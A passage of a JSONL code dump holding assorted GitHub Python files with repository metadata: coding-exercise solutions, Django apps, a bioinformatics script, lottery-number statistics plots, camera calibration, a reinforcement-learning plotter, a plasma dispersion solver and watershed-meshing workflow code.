print(f'dp: {dp}')\n#\n# # return dp[-1]\n# return sum(dp)\n\n\n\"\"\"\nConstant space\n\"\"\"\n\n\nclass Solution:\n def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n dp = 0\n sum = 0\n for i in range(2, len(nums)):\n if nums[i] - nums[i - 1] == nums[i - 1] - nums[i - 2]:\n dp = 1 + dp\n sum += dp\n # Reset\n else:\n dp = 0\n\n return sum\n\n\nnums = [1,2,3,4]\n# nums = [1]\n# nums = [1, 2, 3, 4, 5] # 6\nprint(Solution().numberOfArithmeticSlices(nums))\n\n","repo_name":"yukikitayama/leetcode-python","sub_path":"study-plan/dynamic-programming-i/dp_413_arithmetic_slices_4.py","file_name":"dp_413_arithmetic_slices_4.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"33459958799","text":"from . import SpeechListenerBase\n\nclass VoiceRequestListener(SpeechListenerBase):\n def __init__(self, api_key: str, volume_threshold: int=3000, timeout: float=1.0, detection_timeout: float=10.0, min_duration: float=0.3, max_duration: float=20.0, lang: str=\"ja-JP\", rate: int=44100, channels: int=1, device_index: int=-1):\n super().__init__(api_key, self.on_request, volume_threshold, timeout, detection_timeout, min_duration, max_duration, lang, rate, channels, device_index)\n self.last_recognized_text = None\n\n async def on_request(self, text: str):\n self.last_recognized_text = text\n self.stop_listening()\n\n async def get_request(self):\n await self.start_listening()\n resp = self.last_recognized_text\n self.last_recognized_text = None\n return resp\n","repo_name":"uezo/aiavatarkit","sub_path":"aiavatar/listeners/voicerequest.py","file_name":"voicerequest.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"43"} +{"seq_id":"32499564121","text":"# import vendas.calc_precos\n# from vendas import calc_precos\n\nfrom vendas.calc_precos import aumento, reducao\n# from vendas.formata.preco import real\n\npreco_original = 49.90\n# preco_com_aumento = calc_precos.aumento(preco, 15)\n# preco_com_aumento = vendas.calc_precos.aumento(preco, 15)\npreco_com_aumento = aumento(valor=preco_original, porcentagem=15, formata=True)\npreco_com_reducao = reducao(valor=preco_original, porcentagem=15, formata=True)\nprint(preco_com_aumento)\nprint(preco_com_reducao)\n","repo_name":"filipehlreis/cursopython","sub_path":"sessao3_pythonIntermediario/aula88_comocriarpacote/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11841617659","text":"\"\"\"\nNAME: Inferring mRNA from Protein (Bioinformatics Stronghold)\nCONTRIBUTOR: Aakash Sudhakar\n\nPROBLEM: For positive integers a and n, a modulo n (written a mod n in shorthand) \n is the remainder when a is divided by n. For example, 29 mod 11 = 7 \n because 29 = 11 × 2 + 7.\n\n Modular arithmetic is the study of addition, subtraction, multiplication, \n and division with respect to the modulo operation. We say that a and b \n are congruent modulo n if a mod n = b mod n; in this case, we use the \n notation a ≡ b mod n.\n\n Two useful facts in modular arithmetic are that if a ≡ b mod n and \n c ≡ d mod n, then a + c ≡ b + d mod n and a × c ≡ b × d mod n. \n To check your understanding of these rules, you may wish to verify \n these relationships for a = 29, b = 73, c = 10, d = 32, and n = 11.\n\n As you will see in this exercise, some Rosalind problems will ask for \n a (very large) integer solution modulo a smaller number to avoid the \n computational pitfalls that arise with storing such large numbers.\n\nDATASET: A protein string of length at most 1000 aa.\n\nOUTPUT: The total number of different RNA strings from which the protein \n could have been translated, modulo 1,000,000. \n (Don't neglect the importance of the stop codon in protein translation.)\n\nSAMPLE DATASET: MA\nSAMPLE OUTPUT: 12\n\nSTATUS: Submission successful.\n\"\"\"\n\ndef _codon_dictogram_constructor():\n \"\"\" Constructs frequency table for amino-acid-to-protein conversions. \"\"\"\n codon_dictogram, CODON_TRANSLATION_TABLE = dict(), {\n \"UUU\": \"F\", \"CUU\": \"L\", \"AUU\": \"I\", \"GUU\": \"V\",\n \"UUC\": \"F\", \"CUC\": \"L\", \"AUC\": \"I\", \"GUC\": \"V\",\n \"UUA\": \"L\", \"CUA\": \"L\", \"AUA\": \"I\", \"GUA\": \"V\",\n \"UUG\": \"L\", \"CUG\": \"L\", \"AUG\": \"M\", \"GUG\": \"V\",\n \"UCU\": \"S\", \"CCU\": \"P\", \"ACU\": \"T\", \"GCU\": \"A\",\n \"UCC\": \"S\", \"CCC\": \"P\", \"ACC\": \"T\", \"GCC\": \"A\",\n \"UCA\": \"S\", \"CCA\": \"P\", \"ACA\": \"T\", \"GCA\": \"A\",\n \"UCG\": \"S\", \"CCG\": \"P\", \"ACG\": \"T\", \"GCG\": \"A\",\n \"UAU\": \"Y\", \"CAU\": \"H\", \"AAU\": \"N\", \"GAU\": \"D\",\n \"UAC\": \"Y\", \"CAC\": \"H\", \"AAC\": \"N\", \"GAC\": \"D\",\n \"UAA\": \"Stop\", \"CAA\": \"Q\", \"AAA\": \"K\", \"GAA\": \"E\",\n \"UAG\": \"Stop\", \"CAG\": \"Q\", \"AAG\": \"K\", \"GAG\": \"E\",\n \"UGU\": \"C\", \"CGU\": \"R\", \"AGU\": \"S\", \"GGU\": \"G\",\n \"UGC\": \"C\", \"CGC\": \"R\", \"AGC\": \"S\", \"GGC\": \"G\",\n \"UGA\": \"Stop\", \"CGA\": \"R\", \"AGA\": \"R\", \"GGA\": \"G\",\n \"UGG\": \"W\", \"CGG\": \"R\", \"AGG\": \"R\", \"GGG\": \"G\"\n }\n for _, amino_acid in CODON_TRANSLATION_TABLE.items():\n if amino_acid not in codon_dictogram:\n codon_dictogram[amino_acid] = 0\n codon_dictogram[amino_acid] += 1\n return codon_dictogram\n\ndef sequence_variations_calculator(protein_chain):\n \"\"\" Calculates all possible amino acid variations to generate input protein chain. \"\"\"\n CODON_FREQS, N = _codon_dictogram_constructor(), 1000000\n possible_variations = CODON_FREQS[\"Stop\"]\n for amino_acid in protein_chain:\n possible_variations *= CODON_FREQS[amino_acid]\n return possible_variations % N\n\ndef main():\n # NOTE: Requires being in parent repo ('pwd' must return up to directory '/Rosalind_Bioinformatics/Bioinformatics_Stronghold')\n FILEPATHREAD = \"./datasets/P17_MRNA-dataset.txt\"\n FILEPATHWRITE = \"./outputs/P17_MRNA-output.txt\"\n\n # Reads text data from raw dataset as single-line array of characters\n with open(FILEPATHREAD, \"r\") as fr:\n data = fr.read().strip()\n\n # Calculates total sequence variations constructed from possible RNA combinations\n sequence_variations = sequence_variations_calculator(data)\n\n # Creates output file and writes appropriate response to file and notifies user\n with open(FILEPATHWRITE, \"w\") as fw:\n fw.write(str(sequence_variations))\n\n return print(\"\\nThe Protein-to-mRNA dataset has been processed and the appropriate output has been saved to {}.\\n\".format(FILEPATHWRITE[2:]))\n\nif __name__ == \"__main__\":\n main()","repo_name":"djprofessorkash/Rosalind_Bioinformatics","sub_path":"Bioinformatics_Stronghold/programs/P17_MRNA.py","file_name":"P17_MRNA.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"25079158768","text":"from django.urls import path \nfrom . import views\nurlpatterns = [\n path('', views.index),\n path('add',views.add),\n path('author',views.author),\n path('authoradd',views.authoradd),\n path('author/', views.authordata, name='authordata'),\n path('Book/', views.bookdata, name='bookdata'),\n path('author/addbook',views.addbook ),\n path('Book/addauthor',views.addauthor) \n]\n","repo_name":"Hassano1696/Axsos-Academy","sub_path":"python_stack/django/django_orm/books_authors/books_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14126431033","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\n#解决中文显示问题\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\nimport pandas as pd\nimport pickle\nimport numpy as np\nfrom collections import Counter\n\ncountdx = [] #统计大小号\nnumb = 0 #蓝球号码\nlanqiu = [] #蓝球列表\ncount = []\nposition = []\nsame = 0 #相同次数\ncountlg = [] #大小号间隔\n\n\n#以DataFrame格式读���全部数据\nwith open('dfall.txt', 'rb') as t:\n DFall = pickle.load(t)\nlanqiu = list(DFall['blue'])\nlength = len(lanqiu)\n\n#蓝球最近50次统计\ndef count50(mylist):\n plt.title('蓝球最近50次统计')\n cou = []\n for i in range(1,17):\n cou += [mylist[:50].count(i)]\n return cou\n\n\n#统计蓝球大小号\ndef dxcount(mylist):\n plt.title('统计蓝球大小号')\n dxco = []\n for j in mylist:\n if j >8:\n dxco += [1]\n else :\n dxco += [2]\n return dxco\n\n#统计大小号间隔\ndef lgcount(mylist):\n plt.title('统计大小号间隔')\n lgco = []\n for i in range(1,len(mylist)):\n if mylist[i] == mylist[i-1]:\n same += 1\n else :\n lgco += [same]\n same = 0\n return lgco\n \n#统计n#蓝球出现间隔\ndef countjgn(n):\n st = '统计%d号蓝球出现间隔'%(n)\n plt.title(st)\n p1 = 0\n p2 = 0\n count1 = []\n po = []\n while True:\n try:\n p1 = lanqiu[p2:].index(n)+1\n p2 += p1\n count1 += [p1]\n \n except ValueError:\n break\n res = dict(Counter(count1))\n result = sorted(res)\n for j in range(len(result)):\n k = result[j]\n po += [res[k]]\n\n return result,po\n\n\n\n#显示大小号间隔\n#position = countlg[:100]\n#plt.bar(range(len(position)),position , align='center')\n\n\n\n#统计各蓝球间隔超过n期次数,50期不出现概率3.97%\ndef countdayu(n):\n plt.title('统计各蓝球间隔超过%d期次数'%(n))\n po = []\n for i in range(1,17):\n p2 = 0\n p3 = 0\n count50 = 0\n \n while True:\n try:\n p1 = lanqiu[p3:].index(i)+1\n if p1 > n:\n count50 += 1\n p3 += p1\n if p1 > p2:\n p1,p2 = p2,p1\n \n except ValueError:\n po += [count50]\n break\n return po\n\n\n \n\n#统计各蓝球出现最长间隔\ndef countjgmax():\n plt.title('统计各蓝球出现最长间隔')\n po = []\n for i in range(1,17):\n p2 = 0\n p3 = 0\n\n while True:\n try:\n p1 = lanqiu[p3:].index(i)+1\n p3 += p1\n if p1 > p2:\n p1,p2 = p2,p1\n \n except ValueError:\n po += [p2]\n break\n return po\n\n\n\n#蓝球最近出现时间统计\ndef zuijin():\n po = []\n plt.title('蓝球最近出现时间统计')\n for i in range(1,17):\n p1 = lanqiu[0:].index(i)+1\n po += [p1]\n return po\n\n\nresult,position = countjgn(11)\n\npmax = position.index(max(position))+1\n\nplt.bar(range(len(result)),position , align='center')\nplt.xticks(range(len(result)), result)\n\n#绘制柱状图\n#plt.bar(range(1,17),position,)\nplt.bar(pmax-1,position[pmax-1],color =['r'])\n\n# 在柱状图上显示具体数值, ha参数控制水平对齐方式, va控制垂直对齐方式\nfor x, y in enumerate(position):\n plt.text(x, y , '%s' % y, ha='center', va='bottom')\n \n#设置x轴\n#new_ticks = np.linspace(1, 16, 16)\n#plt.xticks(new_ticks)\n\n# 为两条坐标轴设置名\nplt.xlabel(\"间隔距离\")\nplt.ylabel(\"出现次数\")\n\n# 添加标题\n#plt.title('13#蓝球间隔次数统计')\n\nplt.show() \n\n","repo_name":"cikerli/ciker_li","sub_path":"ssq.py","file_name":"ssq.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1567402067","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Written by Rui Xu, Oct. 2017\n# Email: ruix@princeton.edu\nimport sys\nimport time\nimport disp\nimport utils\nimport logging \nimport argparse\nimport numpy as np\nfrom scipy import interp\nfrom scipy.optimize import root\n__author__ = 'ruix'\n\ndef main(args):\n \"\"\" parse command line arguments\"\"\"\n tstart = time.clock()\n if not args.log :\n logging.basicConfig(level=args.loglevel or logging.INFO)\n else:\n logging.basicConfig(filename='log', filemode='w', level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n\n \"\"\" read plasma parameters \"\"\"\n param = utils.read_param(args)\n \n \"\"\" iterate through wavenumber \"\"\"\n dk = (param['kend'][0]-param['kstart'][0])/param['ksteps'][0]\n fzeta = np.empty(int(param['ksteps'][0]),dtype=complex)\n wave_k = np.empty(int(param['ksteps'][0]))\n zeta_guess = complex(param['omega_r'][0],param['omega_i'][0]) \n\n # eigen value and polaization iEx/Ey*(omega_r/abs(omega_r))\n val = []\n pol = []\n\n for n in range(int(param['ksteps'][0])):\n logger.info('%d th iteration in %d ksteps \\n' ,n,param['ksteps'][0])\n wave_k[n] = param['kstart'][0]+n*dk\n\n \"\"\" find dispersion relation root \"\"\"\n data = (args, param, wave_k[n])\n try:\n # use parallel dsp if theta<0.1 degree\n if (abs(param['theta'][0])<1.):\n sol = root(disp.det_para,(zeta_guess.real,zeta_guess.imag), \\\n args=data,method='hybr',tol=param['sol_err'][0]) \n fzeta[n] = complex(sol.x[0],sol.x[1])\n else:\n sol = root(disp.det,(zeta_guess.real,zeta_guess.imag), \\\n args=data,method='hybr',tol=param['sol_err'][0]) \n fzeta[n] = complex(sol.x[0],sol.x[1])\n logger.info(\"solution: k*di=%1.2e , omega/Omega_ci=%1.2e+%1.2ei\\n\",wave_k[n],fzeta[n].real, fzeta[n].imag)\n if (param['cal_pol'][0]):\n import pol as p\n val0,pol0 = p.pol(args,param,wave_k[n],fzeta[n])\n val.append(val0)\n pol.append(pol0)\n if (fzeta[n].imag<0):\n param['exp'][0] = 0\n except ValueError:\n logger.info('ERROR in root finding: wave_k =%f',wave_k[n])\n\n \"\"\" extrapolate previous solutions for next guess \"\"\"\n if(n>3 and n int:\r\n '配列Aの中のうち、k未満の個数と終わりの0indexを返すライブラリ'\r\n '-1の時は解が無い時'\r\n ans = bisect_left(A, K)\r\n return ans, (-1 if ans == 0 else ans - 1)\r\n\r\nfor _ in range(N):\r\n a = int(input())\r\n k, ind = LessThan(a, num_list)\r\n if k == 0:\r\n num_list.insert(0, a)\r\n else:\r\n num_list[ind] = a\r\nprint(len(num_list))\r\n\r\n ","repo_name":"susami-jpg/AtCoder","sub_path":"ABC/ABC134/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34573048399","text":"import cv2\nimport numpy as np\n\n\nclass Camera:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n def calibrate(self, files, grid, draw_corners=False):\n obj_points = [] # 3d point in real world space\n img_points = [] # 2d points in image plane.\n output = []\n \n grid_points = np.zeros((grid[0]*grid[1], 3), np.float32)\n grid_points[:,:2] = np.mgrid[0:grid[0],0:grid[1]].T.reshape(-1, 2)\n\n for filename in files:\n # Find the chess board corners\n img = cv2.imread(filename)\n ret, corners = cv2.findChessboardCorners(img, grid, None)\n\n # If found, add object points, image points (after refining them)\n if not ret:\n continue\n\n obj_points.append(grid_points)\n img_points.append(corners)\n\n # Draw and display the corners\n if draw_corners:\n img = cv2.drawChessboardCorners(img, grid, corners, ret)\n output.append({ \"filename\": filename, \"img\": img })\n\n # Undistort\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, (self.width, self.height), None, None)\n new_mtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (self.width, self.height), 1, (self.width, self.height))\n\n self.mtx = mtx\n self.dist = dist\n self.new_mtx = new_mtx\n self.roi = roi\n\n return output\n \n def undistort(self, img):\n return cv2.undistort(img, self.mtx, self.dist, None, self.new_mtx)\n \n def redistort(self, img):\n return cv2.undistort(img, self.new_mtx, self.dist, None, self.mtx)\n","repo_name":"gutnar/cleveron-exercise","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"27739458572","text":"from django.db import models\n\n# Create your models here.\nclass Suscripto(models.Model):\n full_name=models.CharField(max_length=100, verbose_name=\"Nombre completo\")\n email=models.EmailField(verbose_name=\"Correo\")\n\nclass Suscripto2(models.Model):\n nombre=models.CharField(max_length=100)\n email=models.EmailField(max_length=30)\n\n####\nfrom django.contrib.auth.models import User\n###\nSTATUS = (\n (0,\"Draft\"),\n (1,\"Publish\")\n)\nclass Post(models.Model):\n titulo=models.CharField(max_length=200, unique=True)\n slug=models.SlugField(max_length=200, unique=True)\n autor=models.ForeignKey(User, on_delete=models.CASCADE,related_name='blog_posts')\n actualizado_el=models.DateTimeField(auto_now=True)\n contenido=models.TextField()\n\n creado_el=models.DateTimeField(auto_now_add=True)\n status=models.IntegerField(choices=STATUS, default=0)\n class Meta:\n ordering=['-creado_el']\n\n def __str__(self):\n return self.titulo\n\n\n","repo_name":"nicolasgeronimorodi/BasicoDjangoBlog","sub_path":"BlogApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9511956700","text":"import atexit\nfrom queue import Empty, Queue\nfrom threading import Thread\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom rllab.sampler.utils import rollout\n\n\n\n\n__all__ = ['init_plot', 'update_plot']\n\nthread = None\nqueue = None\n\n\nclass PlotterThread(Thread):\n def __init__(self, queue, sess):\n super(PlotterThread, self).__init__()\n self.queue = queue\n self.sess = sess\n\n def run(self):\n env = None\n policy = None\n max_length = None\n while True:\n msgs = {}\n # Only fetch the last message of each type\n with self.sess.as_default():\n with self.sess.graph.as_default():\n while True:\n try:\n msg = self.queue.get_nowait()\n msgs[msg[0]] = msg[1:]\n except Empty:\n break\n if 'stop' in msgs:\n break\n elif 'update' in msgs:\n env, policy = msgs['update']\n # env.start_viewer()\n elif 'demo' in msgs:\n param_values, max_length = msgs['demo']\n policy.set_param_values(param_values)\n if not self.sess._closed:\n rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)\n else:\n if max_length:\n if not self.sess._closed:\n rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)\n\n\ndef _shutdown_worker():\n if thread:\n queue.put(['stop'])\n queue.task_done()\n queue.join()\n thread.join()\n\n\ndef _init_worker(**kwargs):\n global queue, thread\n if queue is None:\n queue = Queue()\n if 'sess' in kwargs:\n sess = kwargs.get('sess')\n if sess is None:\n sess = tf.get_default_session()\n else:\n sess = tf.get_default_session()\n thread = PlotterThread(queue, sess)\n thread.daemon = True\n thread.start()\n atexit.register(_shutdown_worker)\n\n\ndef init_plot(env, policy, **kwargs):\n _init_worker(**kwargs)\n queue.put(['update', env, policy])\n queue.task_done()\n\n\ndef update_plot(policy, max_length=np.inf):\n queue.put(['demo', policy.get_param_values(), max_length])\n queue.task_done()\n","repo_name":"raymoss/rllab","sub_path":"sandbox/rocky/tf/plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"14881449591","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport mock\n\nextension_name = 'Matrix'\nextension_namespace = 'http://docs.openstack.org/network/'\nextension_description = 'Simulated reality'\nextension_updated = '2013-07-09T12:00:0-00:00'\nextension_alias = 'Dystopian'\nextension_links = '[{\"href\":''\"https://github.com/os/network\", \"type\"}]'\n\nNETEXT = {\n 'name': extension_name,\n 'namespace': extension_namespace,\n 'description': extension_description,\n 'updated': extension_updated,\n 'alias': extension_alias,\n 'links': extension_links,\n}\n\n\nclass FakeNetworkV2Client(object):\n def __init__(self, **kwargs):\n self.list_extensions = mock.Mock(return_value={'extensions': [NETEXT]})\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/python-openstackclient/openstackclient/tests/network/v2/fakes.py","file_name":"fakes.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"10656543661","text":"class funString():\n def lenStr(self, s):\n return len(s)\n\n def swStr(self, s):\n x = \"\"\n for i in range(len(s)):\n if ord(s[i]) > 90:\n x += chr(ord(s[i])-32)\n else:\n x += chr(ord(s[i])+32)\n return x\n\n def revStr(self, s):\n x = \"\"\n for i in range(len(s)-1, -1, -1):\n x += s[i]\n return x\n\n def remStr(self, s):\n x = \"\"\n for i in range(len(s)):\n if s[i] not in x:\n x += s[i]\n return x\n\n\nfs = funString()\nlis = list(input(\"Enter String and Number of Function : \").split(' '))\ns = lis[0]\nnum = int(lis[1])\nif num == 1:\n print(fs.lenStr(s))\nelif num == 2:\n print(fs.swStr(s))\nelif num == 3:\n print(fs.revStr(s))\nelse:\n print(fs.remStr(s))\n","repo_name":"pjpure/ClassDocuments","sub_path":"DataStructures/lab2/ex_5.py","file_name":"ex_5.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5590469230","text":"\"\"\"High-level routines, espeically those that interact with data,\ni.e. call download_*() or load_*() functions from conf.\n\nMost scripts use these functions instead of directly using lower-level\ncapability.\n\n\"\"\"\n\nimport sys,os\nimport numpy as np\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib.collections as pltc\nimport logging\n\nimport fiona\nimport shapely\nimport meshpy.triangle\n\nimport workflow.conf\nimport workflow.triangulate\nimport workflow.warp\nimport workflow.plot\nimport workflow.tree\nimport workflow.hucs\nimport workflow.hydrography\nimport workflow.clip\nimport workflow.rowcol\n\nimport vtk_io # from ATS/tools/meshing_ats\n\ndef _in_huc(shp, hucstr, source):\n \"\"\"Checks whether shp is in HUC\"\"\"\n logging.debug(\"Checking: shp in '%s'?\"%hucstr)\n\n try:\n fname = source.download(hucstr)\n profile, huc = source.load_huc(hucstr)\n except RuntimeError as err:\n logging.debug(\"No such HUC %s found? %s\"%(hucstr,str(err)))\n raise err\n\n if profile['crs']['init'] != 'epsg:4269':\n # latlong\n raise RuntimeError(\"HUC file for '%s' not in Lat-Lon?\"%hucstr)\n\n huc_shp = shapely.geometry.shape(huc['geometry'])\n logging.debug(\" shp bounds = %r\"%list(shp.bounds))\n logging.debug(\" huc bounds = %r\"%list(huc_shp.bounds))\n if huc_shp.contains(shp):\n logging.debug(' yes!')\n return 2\n elif huc_shp.intersects(shp):\n logging.debug(' sorta!')\n return 1\n else:\n logging.debug(' no!')\n return 0\n\ndef _find_huc(shp, hint, source):\n for i in range(0,100):\n try_huc = hint+'%02i'%i\n try:\n inhuc = _in_huc(shp, try_huc, source)\n except RuntimeError:\n if try_huc.endswith('00'):\n # some huc levels have 00, some don't?\n continue\n else:\n return -1\n\n if inhuc == 2:\n # fully contained in try_huc, recurse if not HUC12\n if len(try_huc) == 12:\n return try_huc\n else:\n return _find_huc(shp, try_huc, source)\n elif inhuc == 1:\n # partially contained in try_huc, return this\n return hint\n return -1\n\n\ndef find_huc(shp_profile, shply, source, hint=None):\n \"\"\"Finds the smallest HUC containing shp, starting with a potential\n hint, i.e. '06' for Tennessee River Valley.\n\n Expects shp in lat-lon, i.e. epsg:4269\n \"\"\"\n if shp_profile['crs']['init'] != 'epsg:4269':\n # latlong\n raise RuntimeError(\"shapefile not in Lat-Lon\")\n\n shply = shply.buffer(-.001)\n\n if hint is None:\n hint = ''\n if len(hint) is 12:\n inhuc = _in_huc(shply, hint, source)\n if inhuc is not 2:\n raise RuntimeError(\"Shape not found in hinted HUC '%s'\"%hint)\n return hint\n \n result = _find_huc(shply, hint, source)\n if type(result) is not str:\n raise RuntimeError(\"Shape not found in hinted HUC '%s'\"%hint)\n return result\n\ndef get_hucs(myhuc, source, level=12, center=True):\n \"\"\"Collects shapefiles for HUCs given a HUC code in string form.\n\n Arguments:\n myhuc | a length N string for the number of the requested HUC.\n | Note this must be an even number of digits, i.e. 01, not 1.\n center | If true, subtract off the HUC centroid.\n\n Returns (huc,huc12s,centroid):\n huc | the fiona shape representation of the requested HUC\n huc12s | a workflow.hucs.HUCs object for shapely shapes of all HUC \n | 12s in myhuc\n centroid| The centroid of the HUC requested, for use in uncentering.\n \"\"\"\n ## === Preprocess HUCs ===\n logging.info(\"\")\n logging.info(\"Preprocessing HUCs\")\n logging.info(\"=====================\")\n\n # collect HUC shapefile\n logging.info(\"collecting HUC %s\"%myhuc[0:2])\n source.download(myhuc)\n\n # load shapefiles for all HUC 12s\n logging.info(\"loading all %is\"%level)\n profile, huc12s = source.load_hucs_in(myhuc, level)\n\n # change coordinates to meters (in place)\n logging.info(\"change coordinates to m\")\n for huc12 in huc12s:\n workflow.warp.warp_shape(huc12, profile['crs'], workflow.conf.default_crs())\n\n # convert to shapely\n huc_shapes = [shapely.geometry.shape(s['geometry']) for s in huc12s]\n\n # if multi-poly, make sure we can convert to single-poly\n single_huc_shapes = []\n for huc_shp in huc_shapes:\n if type(huc_shp) is not shapely.geometry.Polygon:\n assert(len(huc_shp) is 1)\n huc_shp = huc_shp[0]\n assert(type(huc_shp) is shapely.geometry.Polygon)\n single_huc_shapes.append(huc_shp)\n huc_shapes = single_huc_shapes\n\n # center the HUCs\n if center:\n huc_shapes, centroid = workflow.utils.center(huc_shapes)\n else:\n centroid = shapely.geometry.Point(0,0)\n\n # split\n logging.info(\"Split form HUCs\")\n hucs = workflow.hucs.HUCs(huc_shapes)\n logging.info(\"...done\")\n return hucs, centroid\n\ndef get_rivers(myhuc, source):\n \"\"\"Collects shapefiles for hydrography data within a given HUC.\n\n Arguments:\n myhuc | a length N string for the number of the requested HUC.\n | Note this must be an even number of digits, i.e. 01, not 1.\n\n Returns:\n rivers | A list of shapely LineString objects representing all \n | reaches within the HUC.\n \"\"\"\n ## === Preprocess hydrography ===\n logging.info(\"\")\n logging.info(\"Preprocessing hydrography\")\n logging.info(\"==========================\")\n\n # collect hydrography\n logging.info(\"collecting Hydrography %s\"%myhuc)\n source.download(myhuc)\n\n # load the HUC and get a bounding box\n profile, huc = source.load_huc(myhuc)\n bounds = shapely.geometry.shape(huc['geometry']).bounds\n \n # load stream network\n logging.info(\"loading streams\")\n rprofile, rivers = source.load_hydro(myhuc, bounds)\n\n # change coordinates to meters (in place)\n logging.info(\"change coordinates to m\")\n for river in rivers:\n workflow.warp.warp_shape(river, rprofile['crs'], workflow.conf.default_crs())\n\n # convert to shapely\n logging.info(\"merging reaches\")\n rivers_s = shapely.geometry.MultiLineString([shapely.geometry.shape(r['geometry']) for r in rivers])\n rivers_s2 = shapely.ops.linemerge(rivers_s).simplify(1.e-5)\n return rivers_s2\n\ndef get_dem(myhuc, sources):\n \"\"\"Collects a raster DEM that covers the requested HUC.\n\n Arguments:\n huc | The fiona shapefile of the HUC. Output from \n | get_hucs().\n\n Returns (dem_profile, dem):\n dem_profile | A rasterio profile file descriptor object.\n dem | A raster, in lat/lon, of elevations.\n \"\"\"\n logging.info(\"\")\n logging.info(\"Preprocessing DEM\")\n logging.info(\"==========================\")\n logging.info(\"downloading DEM\")\n\n # load shapefiles for the HUC of interest\n logging.info(\"loading HUC %s\"%myhuc)\n profile, huc = sources['HUC'].load_huc(myhuc)\n assert(profile['crs']['init'] == 'epsg:4269') # latlong\n\n dem_profile, dem = workflow.clip.clip_dem(huc, sources['DEM'])\n dem = dem[0,:,:] # only the first band\n return dem_profile, dem\n\n\ndef get_shapes(filename, index, center=True, make_hucs=True):\n \"\"\"Collects shapefiles.\n\n Arguments:\n filename| File to parse, should end in .shp\n index | Index of the requested shape in filename, or -1 to get all.\n center | If true, subtract off the centroid.\n\n Returns (profile, sheds, boundary, centroid)\n profile | the fiona profile/projection/etc for the shapefile\n | Note this includes original projection.\n sheds | a workflow.hucs.HUCs object for all watershed shapes requested, \n | in the default coordinate system.\n boundary| The boundary of the union of watersheds, in the original\n | coordinate system.\n centroid| The centroid of the watersheds requested, for use in uncentering.\n \"\"\"\n logging.info(\"\")\n logging.info(\"Preprocessing Shapes\")\n logging.info(\"=====================\")\n\n # load shapefile\n logging.info(\"loading file: %s\"%filename)\n with fiona.open(filename, 'r') as fid:\n profile = fid.profile\n if index < 0:\n shps = [s for s in fid]\n else:\n shps = [fid[index],]\n\n # convert the original coordinate system to lat-lon to get a lat-lon boundary\n if profile['crs']['init'] != 'epsg:4269':\n for shp in shps:\n workflow.warp.warp_shape(shp, profile['crs'], workflow.conf.latlon_crs())\n profile['crs']['init'] = 'epsg:4269'\n \n # convert original coordinate system to shapely\n huc_shapes = [shapely.geometry.shape(s['geometry']) for s in shps]\n boundary = shapely.ops.cascaded_union(huc_shapes)\n \n # change coordinates to meters (in place)\n logging.info(\"change coordinates to m\")\n for shp in shps:\n workflow.warp.warp_shape(shp, profile['crs'], workflow.conf.default_crs())\n\n # convert to shapely\n huc_shapes = [shapely.geometry.shape(s['geometry']) for s in shps]\n\n # center the HUCs\n if center:\n huc_shapes, centroid = workflow.utils.center(huc_shapes)\n else:\n centroid = shapely.geometry.Point(0,0)\n\n # split\n logging.info(\"Split form subwatersheds\")\n if make_hucs:\n hucs = workflow.hucs.HUCs(huc_shapes)\n else:\n hucs = huc_shapes\n logging.info(\"...done\")\n return profile, hucs, boundary, centroid\n \n\ndef simplify_and_prune(hucs, rivers, args):\n \"\"\"Cleans up the HUC and river shapes, making sure intersections are\n proper, snapped, simplified, etc.\n\n \"\"\"\n tol = args.simplify\n \n 